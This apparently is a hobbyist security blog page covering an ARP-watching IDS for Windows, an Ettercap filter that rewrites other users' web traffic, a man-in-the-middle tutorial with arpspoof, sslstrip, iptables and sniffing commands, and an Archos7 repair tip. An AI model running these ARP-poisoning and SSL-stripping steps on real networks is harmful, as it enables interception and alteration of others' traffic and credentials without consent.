IronGeek's DecaffeinatID

Well I've been playing around a bit with a windows VM that acts as a Honeypot/IDS for my network which I can remotely monitor with my Archos7 via VNC. One of the apps I've come across is "DecaffeinatID" which is a very simple IDS/ARP Watcher. I've never heard of it before and found it quite a nice addition to my arsenal so I figured I would spread the info. Here's alittle bit of info about it, taken from IronGeek.

This project started because I (IronGeek) wanted a simple ARP Watch like application for Windows. In a short matter of time, feature creep set in. DecaffeinatID is a simple little app that acts as an Intrusion Detection System (more of a log watcher really) to notify the user whenever fellow users at their local WiFi hotspot/ LAN are up to the kind of "reindeer games" that often happen at coffee shops and hacker cons. It's not meant to be a replacement for something more feature rich (but complicated) like Snort. DecaffeinatID watches the Windows logs for three main things and pops up a message in the Windows Systray when it sees any of the following

New or changed ARP table entries

Think of this as a poor man's ARPWatch for Windows. The IDS gives a special alert whenever it sees the MAC address of the IP gateway change.

 

New events in security log

This will let you know about attempted and successful logins, assuming you have set up auditing for such things in your local security settings.

New events in the firewall log

DecaffeinatID will read your Windows firewall log (if you have one) and list events

          

Download

You can find more info here

Ettercap Porn Filter

Ever get tired of your little brother or your perverted neighbor watching porn and wasting perfectly good bandwith on nonsense. Well here's a fun solution to that Below is an ettercap filter I tossed together to play around with. To create an ettercap filter you first have to create a new file to begin scripting. In this case it will be "hak.filter". Once you have your desired filter scripted, you can then compile it using Etterfilter and then it's ready for use.

Below is an example filter for people to play with and get an idea of how they work. What it does is quite obvious, it changes the word porn to a link saying "You Need Help" which takes them to "www.no-porn.com", a site for porn addiction. It also changes a few other words

You can find the script here;

http://pastebin.com/L7PCPNap

To compile it simply make a new file called hak.filter than once you have your desired script ready, you use this command in a terminal.

etterfilter hak.filter -o name.ef

At this point the filter is ready for use, to use it simply add a "-F name.ef" when running ettercap.

Example Useage: ettercap -TM arp:remote // // -F name.ef -i wlan0

Man In The Middle tutorial - SSLStrip and Arp Poisoning.

Linux Distro

• Backtrack4 R1 http://www.backtrack-linux.org/downloads/

Tools used

• Ettercap
• SSLStrip
• Dsniff suite (URLSnarf)
• Driftnet
• Arpspoof
• fping
• nano

Commands

• nano /etc/etter.conf
• fping -a -g 192.168.1.9 192.168.1.1 -s >hosts
• sslstrip -a -k -f
• iptables -t nat -A PREROUTING -p tcp --destination-port  80 -j REDIRECT --to-ports 10000
• echo "1" > /proc/sys/net/ipv4/ip_forward
• arpspoof -i wlan0 -t 192.168.1.9 192.168.1.1
• ettercap -Tq -L etterlogs -i wlan0
• urlsnarf -vvv -i wlan0
• driftnet -v -i wlan0 

A possible fix for hopeless Archos7's that wont stop restarting

Well I recently had a Archos7 that would not stop resetting when I booted it. The damn thing would reboot the second I touched the screen, and in some cases before it could even boot. I'm not sure if this will solve others problems but I simply put a new rom (Update.img) on an SD card and the moment it booted (took a few tries) I slipped the card in and quickely hit the Update button before it had the chance to reboot and just like that, it worked perfectely.